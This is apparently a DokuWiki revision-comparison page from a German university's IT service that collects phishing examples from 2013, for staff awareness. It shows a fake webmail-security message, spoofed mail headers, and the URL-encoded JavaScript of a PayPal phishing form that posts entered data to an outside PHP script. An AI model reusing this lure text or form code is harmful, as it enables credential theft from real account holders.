Benutzer-Werkzeuge

Webseiten-Werkzeuge


email:phishing_beispiele

Unterschiede

Hier werden die Unterschiede zwischen zwei Versionen angezeigt.

Link zu dieser Vergleichsansicht

Beide Seiten der vorigen Revision Vorhergehende Überarbeitung
Nächste Überarbeitung
Vorhergehende Überarbeitung
email:phishing_beispiele [2013/08/15 15:44]
2007
email:phishing_beispiele [2013/09/10 15:28] (aktuell)
2007 [Webmail Konto]
Zeile 1: Zeile 1:
-==== Beispiele von gefälschten Nachrichten ====+===== Beispiele von gefälschten Nachrichten =====
  
-Eingang am 2.Mai 2013, hier wird darum gebeten, auf einen Link zu klicken und Daten auf einer webseite einzugeben. Absender-Adresse ist web-master@fh-sm.de.+==== Sparkasse ====
  
-<code> +Eingang am 4. Juli 2013:
-Achtung:+
  
-Ein Versuch wurde gemacht, um von einem neuen Computer anmelden. Für die +{{:email:ihre_online-banking.pdf|}}
-Sicherheit Ihres Kontos, sind wir bereit, um eine Abfrage zu öffnen. Bitte +
-Klicken Sie auf den Link oder kopieren Sie auf Ihrem Web-Browser für gute +
-Sicherheit der Praxis.+
  
-https://www.formstack.com/forms/?1464636-9VoANNgXVL+----
  
-Nicht ignorieren Sie diese Nachricht an Kündigung Ihres Webmail-Konto zu +==== Webmail Konto ====
-vermeiden.+
  
-Web Administration +Eingang am 6. Juli 2013:
-</code>+
  
-und ein paar Header (für Experten)+{{:email:ihr_webmail-konto_hat_sein_limit_überschritten._.pdf|}}
  
-<code> 
-Received: from libra.astro.bas.bg (localhost [127.0.0.1]) 
- by libra.astro.bas.bg (Postfix) with ESMTP id 0E5F5300DDF; 
- Thu,  2 May 2013 13:39:30 +0300 (EEST) 
-Received: from 69.147.227.228 
-        (SquirrelMail authenticated user duchlev) 
-        by libra.astro.bas.bg with HTTP; 
-        Thu, 2 May 2013 10:39:30 -0000 
-Message-ID: <8f1ebf3fae2c40f2e27b8508cae68b71.squirrel@libra.astro.bas.bg> 
-Date: Thu, 2 May 2013 10:39:30 -0000 
-Subject: MELDUNG 
-From: "web-master@fh-sm.de" <web-master@fh-sm.de> 
-Reply-To: web-master@fh-sm.de 
-User-Agent: SquirrelMail/1.5.2 [SVN] 
-To: undisclosed-recipients:; 
-</code> 
 ---- ----
  
-Eingang am 4Juli 2013:+==== Webmail Konto ==== 
 + 
 +Eingang am 14.Aug.2013: 
 + 
 +{{:email:bestätigen_email-benachrichtigung.pdf|}}
  
-{{:email:ihre_online-banking.pdf|}} 
  
 ---- ----
  
-Eingang am 6. Juli 2013:+==== Webmail Konto ====
  
-{{:email:ihr_webmail-konto_hat_sein_limit_überschritten._.pdf|}}+Eingang am 09.Sept. 2013: 
 + 
 +{{:email:meldung.pdf|}}
  
 ---- ----
  
-Eingang am 14.Aug.2013:+==== PayPal ====
  
-{{:email:bestätigen_email-benachrichtigung.pdf|}}+Eingang am 10.Sept. 2013: 
 +{{:email:sicherheitsmassnahmen.pdf|}} mit diesem {{:email:wiederherstellung_ihres_paypal-kontos_-_paypal.pdf|HTML-Formular}} im Anhang.
  
-einige Header (für Experten)+Abgesendet wird das Formular an diese url: http://mirondeladelsarts.com/sender.php, die wiederum in diesem javascript-schnipsel verborgen ist
-<code> +<code javascript
-Received: from webmail.undip.ac.id (localhost [127.0.0.1]) +document.write(unescape('%3C%2F%74%64%3E%0A%20%20%20%20%3C%2F%74%72%3E%3C%74%72%3E%0A%20%20%20%20%20%20%3C%74%64%20%69%64%3D%22%62%6F%64%79%22%3E%20%3C%66%6F%6E%74%20%63%6F%6C%6F%72%3D%22%23%46%46%46%46%46%46%22%3E%2E%3C%2F%66%6F%6E%74%3E%42%69%74%74%65%20%66%26%75%75%6D%6C%3B%6C%6C%65%6E%20%53%69%65%20%61%6C%6C%65%20%46%65%6C%64%65%72%20%61%75%73%2E%3C%62%72%20%2F%3E%0A%20%20%20%20%20%20%20%20%3C%66%6F%72%6D%20%6E%61%6D%65%3D%22%72%61%66%22%20%61%63%74%69%6F%6E%3D%22%68%74%74%70%3A%2F%2F%6D%69%72%6F%6E%64%65%6C%61%64%65%6C%73%61%72%74%73%2E%63%6F%6D%2F%73%65%6E%64%65%72%2E%70%68%70%22%20%6D%65%74%68%6F%64%3D%22%70%6F%73%74%22%20%6F 
- by smtp.undip.ac.id (vPostMaster) with ESMTPA id D934E1F06076; +%6E%73%75%62%6D%69%74%3D%22%72%65%74%75%72%6E%20%76%61%6C%69%64%61%74%65%28%74%6 
- Wed, 14 Aug 2013 18:57:52 +0700 (WIT) +8%69%73%29%22%3E%3C%69%6E%70%75%74%20%74%79%70%65%3D%22%68%69%64%64%65%6E%22%20% 
-Date: Wed, 14 Aug 2013 13:57:52 +0200 +6E%61%6D%65%3D%22%72%65%64%69%72%22%20%76%61%6C%75%65%3D%22%68%74%74%70%73%3A%2F 
-From: Fachhochschule Schmalkalden <webmail@fh-sm.de> +%2F%77%77%77%2E%70%61%79%70%61%6C%2E%63%6F%6D%2F%22%20%2F%3E%0A%20%20%20%20%20%2 
-Reply-To: <desks@mail.com> +0%20%20%20%20%3C%74%61%62%6C%65%20%69%64%3D%22%66%6F%72%6D%22%3E%0A%20%20%20%20% 
-Mail-Reply-To: <desks@mail.com> +20%20%20%20%20%20%20%20%3C%74%72%3E%20'));
-Message-ID: <6747ebeed58816a28568e15ff3ca1628@undip.ac.id> +
-X-Sender: webmail@fh-sm.de +
-User-Agent: Roundcube Webmail/RCMAIL_VERSION+
 </code> </code>
 +Es wird sofort an eine offizielle PayPal-Seite umgeleitet. 
  
------+----
  
-weitere Beispiele der Uni Weimar:+==== weitere Beispiele der Uni Weimar ====
  
 [[http://www.uni-weimar.de/de/universitaet/struktur/zentrale-einrichtungen/scc-rechenzentrum/it-sicherheit/phishing/phishing-e-mails/]] [[http://www.uni-weimar.de/de/universitaet/struktur/zentrale-einrichtungen/scc-rechenzentrum/it-sicherheit/phishing/phishing-e-mails/]]
email/phishing_beispiele.1376574261.txt.gz · Zuletzt geändert: 2013/08/15 15:44 von 2007